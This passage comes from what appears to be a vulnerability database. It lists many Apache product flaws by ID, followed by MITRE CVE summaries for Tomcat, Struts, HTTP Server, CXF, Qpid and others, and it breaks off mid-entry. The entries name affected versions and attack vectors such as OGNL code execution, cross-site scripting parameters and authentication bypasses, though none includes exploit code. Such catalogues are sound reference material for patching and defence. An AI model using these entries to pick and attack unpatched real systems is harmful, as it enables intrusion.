5023| [49856] Apache HTTP Server 2.2.13 mod_proxy_ftp ap_proxy_ftp_handler denial of service
5024| [49348] Apache Xerces-C++ 2.7.0 Stack-Based denial of service
5025| [86789] Apache Portable Runtime memory/unix/apr_pools.c unknown vulnerability
5026| [49283] Apache APR-util up to 1.3.8 apr-util misc/apr_rmm.c apr_rmm_realloc memory corruption
5027| [48952] Apache HTTP Server up to 1.3.6 mod_deflate denial of service
5028| [48626] Apache Tomcat up to 4.1.23 Access Restriction directory traversal
5029| [48431] Apache Tomcat up to 4.1.23 j_security_check cross site scripting
5030| [48430] Apache Tomcat up to 4.1.23 mod_jk denial of service
5031| [47801] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site request forgery
5032| [47800] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site scripting
5033| [47799] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console directory traversal
5034| [47648] Apache Tiles 2.1.0/2.1.1 cross site scripting
5035| [47640] Apache Struts 2.0.6/2.0.8/2.0.9/2.0.11/2.1 cross site scripting
5036| [47638] Apache Tomcat up to 4.1.23 mod_jk information disclosure
5037| [47636] Apache Struts 2.0.9 xip_client.html cross site scripting
5038| [47593] Apache Mod Perl 1 perl-status Apache::Status cross site scripting
5039| [47637] Apache Struts 1.0.2/1.1/1.2.4/1.2.7/1.2.8 cross site scripting
5040| [47239] Apache Struts up to 2.1.2 Beta struts directory traversal
5041| [47214] Apachefriends xampp 1.6.8 spoofing
5042| [47213] Apachefriends xampp 1.6.8 htaccess cross site request forgery
5043| [47162] Apachefriends XAMPP 1.4.4 weak authentication
5044| [47065] Apache Tomcat 4.1.23 cross site scripting
5045| [46834] Apache Tomcat up to 5.5.20 cross site scripting
5046| [46004] Apache Jackrabbit 1.4/1.5.0 search.jsp cross site scripting
5047| [49205] Apache Roller 2.3/3.0/3.1/4.0 Search cross site scripting
5048| [86625] Apache Struts directory traversal
5049| [44461] Apache Tomcat up to 5.5.0 information disclosure
5050| [44389] Apache Xerces-C++ XML Parser Memory Consumption denial of service
5051| [44352] Apache Friends XAMPP 1.6.8 adodb.php cross site scripting
5052| [43663] Apache Tomcat up to 6.0.16 directory traversal
5053| [43612] Apache Friends XAMPP 1.6.7 iart.php cross site scripting
5054| [43556] Apache HTTP Server up to 2.1.8 mod_proxy_ftp proxy_ftp.c cross site scripting
5055| [43516] Apache Tomcat up to 4.1.20 directory traversal
5056| [43509] Apache Tomcat up to 6.0.13 cross site scripting
5057| [42637] Apache Tomcat up to 6.0.16 cross site scripting
5058| [42325] Apache HTTP Server up to 2.1.8 Error Page cross site scripting
5059| [41838] Apache-SSL 1.3.34 1.57 expandcert privilege escalation
5060| [41091] Apache Software Foundation Mod Jk up to 2.0.1 mod_jk2 Stack-based memory corruption
5061| [40924] Apache Tomcat up to 6.0.15 information disclosure
5062| [40923] Apache Tomcat up to 6.0.15 unknown vulnerability
5063| [40922] Apache Tomcat up to 6.0 information disclosure
5064| [40710] Apache HTTP Server up to 2.0.61 mod_negotiation cross site scripting
5065| [40709] Apache HTTP Server up to 2.0.53 mod_negotiation cross site scripting
5066| [40656] Apache Tomcat 5.5.20 information disclosure
5067| [40503] Apache HTTP Server mod_proxy_ftp cross site scripting
5068| [40502] Apache HTTP Server up to 2.2.5 mod_proxy_balancer memory corruption
5069| [40501] Apache HTTP Server 2.2.6 mod_proxy_balancer cross site request forgery
5070| [40398] Apache HTTP Server up to 2.2 mod_proxy_balancer cross site scripting
5071| [40397] Apache HTTP Server up to 2.2 mod_proxy_balancer balancer_handler denial of service
5072| [40234] Apache Tomcat up to 6.0.15 directory traversal
5073| [40221] Apache HTTP Server 2.2.6 information disclosure
5074| [40027] David Castro Apache Authcas 0.4 sql injection
5075| [3495] Apache OpenOffice up to 2.3 Database Document Processor unknown vulnerability
5076| [3489] Apache HTTP Server 2.x HTTP Header cross site scripting
5077| [3414] Apache Tomcat WebDAV Stored privilege escalation
5078| [39489] Apache Jakarta Slide up to 2.1 directory traversal
5079| [39540] Apache Geronimo 2.0/2.0.1/2.0.2/2.1 unknown vulnerability
5080| [3310] Apache OpenOffice 1.1.3/2.0.4/2.2.1 TIFF Image Parser Heap-based memory corruption
5081| [38768] Apache HTTP Server up to 2.1.7 mod_autoindex.c cross site scripting
5082| [38952] Apache Geronimo 2.0.1/2.1 unknown vulnerability
5083| [38658] Apache Tomcat 4.1.31 cal2.jsp cross site request forgery
5084| [38524] Apache Geronimo 2.0 unknown vulnerability
5085| [3256] Apache Tomcat up to 6.0.13 cross site scripting
5086| [38331] Apache Tomcat 4.1.24 information disclosure
5087| [38330] Apache Tomcat 4.1.24 information disclosure
5088| [38185] Apache Tomcat 3.3/3.3.1/3.3.1a/3.3.2 Error Message CookieExample cross site scripting
5089| [37967] Apache Tomcat up to 4.1.36 Error Message sendmail.jsp cross site scripting
5090| [37647] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 Authorization unknown vulnerability
5091| [37646] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 unknown vulnerability
5092| [3141] Apache Tomcat up to 4.1.31 Accept-Language Header cross site scripting
5093| [3133] Apache Tomcat up to 6.0 HTTP cross site scripting
5094| [37292] Apache Tomcat up to 5.5.1 cross site scripting
5095| [3130] Apache OpenOffice 2.2.1 RTF Document Heap-based memory corruption
5096| [36981] Apache Tomcat JK Web Server Connector up to 1.2.22 mod_jk directory traversal
5097| [36892] Apache Tomcat up to 4.0.0 hello.jsp cross site scripting
5098| [37320] Apache MyFaces Tomahawk up to 1.1.4 cross site scripting
5099| [36697] Apache Tomcat up to 5.5.17 implicit-objects.jsp cross site scripting
5100| [36491] Apache Axis 1.0 Installation javaioFileNotFoundException information disclosure
5101| [36400] Apache Tomcat 5.5.15 mod_jk cross site scripting
5102| [36698] Apache Tomcat up to 4.0.0 cal2.jsp cross site scripting
5103| [36224] XAMPP Apache Distribution up to 1.6.0a adodb.php connect memory corruption
5104| [36225] XAMPP Apache Distribution 1.6.0a sql injection
5105| [2997] Apache httpd/Tomcat 5.5/6.0 directory traversal
5106| [35896] Apache Apache Test up to 1.29 mod_perl denial of service
5107| [35653] Avaya S8300 Cm 3.1.2 Apache Tomcat unknown vulnerability
5108| [35402] Apache Tomcat JK Web Server Connector 1.2.19 mod_jk.so map_uri_to_worker memory corruption
5109| [35067] Apache Stats up to 0.0.2 extract unknown vulnerability
5110| [35025] Apache Stats up to 0.0.3 extract unknown vulnerability
5111| [34252] Apache HTTP Server denial of service
5112| [2795] Apache OpenOffice 2.0.4 WMF/EMF File Heap-based memory corruption
5113| [33877] Apache Opentaps 0.9.3 cross site scripting
5114| [33876] Apache Open For Business Project unknown vulnerability
5115| [33875] Apache Open For Business Project cross site scripting
5116| [2703] Apache Jakarta Tomcat up to 5.x der_get_oid memory corruption
5117| [2611] Apache HTTP Server up to 1.0.1 set_var Format String
5118|
5119| MITRE CVE - https://cve.mitre.org:
5120| [CVE-2013-4156] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted element in an OOXML document file.
5121| [CVE-2013-4131] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.
5122| [CVE-2013-3239] phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir directory is configured, allows remote authenticated users to execute arbitrary code by using a double extension in the filename of an export file, leading to interpretation of this file as an executable file by the Apache HTTP Server, as demonstrated by a .php.sql filename.
5123| [CVE-2013-3060] The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests.
5124| [CVE-2013-2765] The ModSecurity module before 2.7.4 for the Apache HTTP Server allows remote attackers to cause a denial of service (NULL pointer dereference, process crash, and disk consumption) via a POST request with a large body and a crafted Content-Type header.
5125| [CVE-2013-2251] Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
5126| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
5127| [CVE-2013-2248] Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.
5128| [CVE-2013-2189] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via invalid PLCF data in a DOC document file.
5129| [CVE-2013-2135] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both "${}" and "%{}" sequences, which causes the OGNL code to be evaluated twice.
5130| [CVE-2013-2134] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.
5131| [CVE-2013-2115] Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.
5132| [CVE-2013-2071] java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.
5133| [CVE-2013-2067] java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.
5134| [CVE-2013-1966] Apache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.
5135| [CVE-2013-1965] Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
5136| [CVE-2013-1896] mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML data refers to a non-DAV URI.
5137| [CVE-2013-1884] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (segmentation fault and crash) via a log REPORT request with an invalid limit, which triggers an access of an uninitialized variable.
5138| [CVE-2013-1879] Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message."
5139| [CVE-2013-1862] mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator.
5140| [CVE-2013-1849] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a PROPFIND request for an activity URL.
5141| [CVE-2013-1847] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an anonymous LOCK for a URL that does not exist.
5142| [CVE-2013-1846] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a LOCK on an activity URL.
5143| [CVE-2013-1845] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (memory consumption) by (1) setting or (2) deleting a large number of properties for a file or directory.
5144| [CVE-2013-1814] The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.
5145| [CVE-2013-1777] The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
5146| [CVE-2013-1768] The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and 2.x before 2.2.2 creates local executable JSP files containing logging trace data produced during deserialization of certain crafted OpenJPA objects, which makes it easier for remote attackers to execute arbitrary code by creating a serialized object and leveraging improperly secured server programs.
5147| [CVE-2013-1088] Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 before SP6 Patch 1 allows remote attackers to hijack the authentication of arbitrary users by leveraging improper request validation by iManager code deployed within an Apache Tomcat container.
5148| [CVE-2013-1048] The Debian apache2ctl script in the apache2 package squeeze before 2.2.16-6+squeeze11, wheezy before 2.2.22-13, and sid before 2.2.22-13 for the Apache HTTP Server on Debian GNU/Linux does not properly create the /var/lock/apache2 lock directory, which allows local users to gain privileges via an unspecified symlink attack.
5149| [CVE-2013-0966] The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac OS X before 10.8.3 does not properly handle ignorable Unicode characters, which allows remote attackers to bypass intended directory authentication requirements via a crafted pathname in a URI.
5150| [CVE-2013-0942] Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Agent 7.1 before 7.1.1 for Web for Internet Information Services, and 7.1 before 7.1.1 for Web for Apache, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
5151| [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data.
5152| [CVE-2013-0253] The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
5153| [CVE-2013-0248] The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack.
5154| [CVE-2013-0239] Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, when the plaintext UsernameToken WS-SecurityPolicy is enabled, allows remote attackers to bypass authentication via a security header of a SOAP request containing a UsernameToken element that lacks a password child element.
5155| [CVE-2012-6573] Cross-site scripting (XSS) vulnerability in the Apache Solr Autocomplete module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors involving autocomplete results.
5156| [CVE-2012-6551] The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests.
5157| [CVE-2012-6092] Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551.
5158| [CVE-2012-5887] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.
5159| [CVE-2012-5886] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.
5160| [CVE-2012-5885] The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.
5161| [CVE-2012-5786] The wsdl_first_https sample code in distribution/src/main/release/samples/wsdl_first_https/src/main/ in Apache CXF, possibly 2.6.0, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
5162| [CVE-2012-5785] Apache Axis2/Java 1.6.2 and earlier does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
5163| [CVE-2012-5784] Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal Mass Pay, PayPal Transactional Information SOAP, the Java Message Service implementation in Apache ActiveMQ, and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
5164| [CVE-2012-5783] Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
5165| [CVE-2012-5633] The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before 2.6.5, and 2.7.x before 2.7.2, when using the WSS4JInInterceptor, bypasses WS-Security processing, which allows remote attackers to obtain access to SOAP services via an HTTP GET request.
5166| [CVE-2012-5616] Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly Citrix CloudStack) before 3.0.6 stores sensitive information in the log4j.conf log file, which allows local users to obtain (1) the SSH private key as recorded by the createSSHKeyPair API, (2) the password of an added host as recorded by the AddHost API, or the password of an added VM as recorded by the (3) DeployVM or (4) ResetPasswordForVM API.
5167| [CVE-2012-5568] Apache Tomcat through 7.0.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.
5168| [CVE-2012-5351] Apache Axis2 allows remote attackers to forge messages and bypass authentication via a SAML assertion that lacks a Signature element, aka a "Signature exclusion attack," a different vulnerability than CVE-2012-4418.
| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
| [CVE-2012-4557] The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through 2.2.21 places a worker node into an error state upon detection of a long request-processing time, which allows remote attackers to cause a denial of service (worker consumption) via an expensive request.
| [CVE-2012-4556] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 allows remote attackers to cause a denial of service (Apache httpd web server child process restart) via certain unspecified empty search fields in a user certificate search query.
| [CVE-2012-4555] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 does not properly handle interruptions of token format operations, which allows remote attackers to cause a denial of service (NULL pointer dereference and Apache httpd web server child process crash) via unspecified vectors.
| [CVE-2012-4534] org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28, when the NIO connector is used in conjunction with sendfile and HTTPS, allows remote attackers to cause a denial of service (infinite loop) by terminating the connection during the reading of a response.
| [CVE-2012-4528] The mod_security2 module before 2.7.0 for the Apache HTTP Server allows remote attackers to bypass rules, and deliver arbitrary POST data to a PHP application, via a multipart request in which an invalid part precedes the crafted data.
| [CVE-2012-4501] Citrix Cloud.com CloudStack, and Apache CloudStack pre-release, allows remote attackers to make arbitrary API calls by leveraging the system user account, as demonstrated by API calls to delete VMs.
| [CVE-2012-4460] The serializing/deserializing functions in the qpid::framing::Buffer class in Apache Qpid 0.20 and earlier allow remote attackers to cause a denial of service (assertion failure and daemon exit) via unspecified vectors. NOTE: this issue could also trigger an out-of-bounds read, but it might not trigger a crash.
| [CVE-2012-4459] Integer overflow in the qpid::framing::Buffer::checkAvailable function in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (crash) via a crafted message, which triggers an out-of-bounds read.
| [CVE-2012-4458] The AMQP type decoder in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (memory consumption and server crash) via a large number of zero width elements in the client-properties map in a connection.start-ok message.
| [CVE-2012-4446] The default configuration for Apache Qpid 0.20 and earlier, when the federation_tag attribute is enabled, accepts AMQP connections without checking the source user ID, which allows remote attackers to bypass authentication and have other unspecified impact via an AMQP request.
| [CVE-2012-4431] org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.
| [CVE-2012-4418] Apache Axis2 allows remote attackers to forge messages and bypass authentication via an "XML Signature wrapping attack."
| [CVE-2012-4387] Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial of service (CPU consumption) via a long parameter name, which is processed as an OGNL expression.
| [CVE-2012-4386] The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.
| [CVE-2012-4360] Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0.10.19.1 through 0.10.22.4 for the Apache HTTP Server allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2012-4063] The Apache Santuario configuration in Eucalyptus before 3.1.1 does not properly restrict applying XML Signature transforms to documents, which allows remote attackers to cause a denial of service via unspecified vectors.
| [CVE-2012-4001] The mod_pagespeed module before 0.10.22.6 for the Apache HTTP Server does not properly verify its host name, which allows remote attackers to trigger HTTP requests to arbitrary hosts via unspecified vectors, as demonstrated by requests to intranet servers.
| [CVE-2012-3908] Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE Administrator user interface (aka the Apache Tomcat interface) on Cisco Identity Services Engine (ISE) 3300 series appliances before 1.1.0.665 Cumulative Patch 1 allow remote attackers to hijack the authentication of administrators, aka Bug ID CSCty46684.
| [CVE-2012-3546] org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.30, when FORM authentication is used, allows remote attackers to bypass security-constraint checks by leveraging a previous setUserPrincipal call and then placing /j_security_check at the end of a URI.
| [CVE-2012-3544] Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.
| [CVE-2012-3526] The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the Apache HTTP Server allows remote attackers to cause a denial of service (server or application crash) via multiple X-Forwarded-For headers in a request.
| [CVE-2012-3513] munin-cgi-graph in Munin before 2.0.6, when running as a CGI module under Apache, allows remote attackers to load new configurations and create files in arbitrary directories via the logdir command.
| [CVE-2012-3506] Unspecified vulnerability in the Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.03 has unknown impact and attack vectors.
| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
| [CVE-2012-3467] Apache QPID 0.14, 0.16, and earlier uses a NullAuthenticator mechanism to authenticate catch-up shadow connections to AMQP brokers, which allows remote attackers to bypass authentication.
| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
| [CVE-2012-3446] Apache Libcloud before 0.11.1 uses an incorrect regular expression during verification of whether the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a crafted certificate.
| [CVE-2012-3376] DataNodes in Apache Hadoop 2.0.0 alpha does not check the BlockTokens of clients when Kerberos is enabled and the DataNode has checked out the same BlockPool twice from a NodeName, which might allow remote clients to read arbitrary blocks, write to blocks to which they only have read access, and have other unspecified impacts.
| [CVE-2012-3373] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.21 and 1.5.x before 1.5.8 allows remote attackers to inject arbitrary web script or HTML via vectors involving a %00 sequence in an Ajax link URL associated with a Wicket app.
| [CVE-2012-3126] Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Products Suite 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Apache Tomcat Agent.
| [CVE-2012-3123] Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect confidentiality, related to Apache HTTP Server.
| [CVE-2012-2760] mod_auth_openid before 0.7 for Apache uses world-readable permissions for /tmp/mod_auth_openid.db, which allows local users to obtain session ids.
| [CVE-2012-2733] java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP NIO connector in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28 does not properly restrict the request-header size, which allows remote attackers to cause a denial of service (memory consumption) via a large amount of header data.
| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
| [CVE-2012-2381] Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role.
| [CVE-2012-2380] Multiple cross-site request forgery (CSRF) vulnerabilities in the admin/editor console in Apache Roller before 5.0.1 allow remote attackers to hijack the authentication of admins or editors by leveraging the HTTP POST functionality.
| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
| [CVE-2012-2329] Buffer overflow in the apache_request_headers function in sapi/cgi/cgi_main.c in PHP 5.4.x before 5.4.3 allows remote attackers to cause a denial of service (application crash) via a long string in the header of an HTTP request.
| [CVE-2012-2145] Apache Qpid 0.17 and earlier does not properly restrict incoming client connections, which allows remote attackers to cause a denial of service (file descriptor consumption) via a large number of incomplete connections.
| [CVE-2012-2138] The @CopyFrom operation in the POST servlet in the org.apache.sling.servlets.post bundle before 2.1.2 in Apache Sling does not prevent attempts to copy an ancestor node to a descendant node, which allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP request.
| [CVE-2012-2098] Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.
| [CVE-2012-1574] The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.
| [CVE-2012-1181] fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP Server does not recognize the FcgidMaxProcessesPerClass directive for a virtual host, which makes it easier for remote attackers to cause a denial of service (memory consumption) via a series of HTTP requests that triggers a process count higher than the intended limit.
| [CVE-2012-1089] Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package.
| [CVE-2012-1007] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.
| [CVE-2012-1006] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.
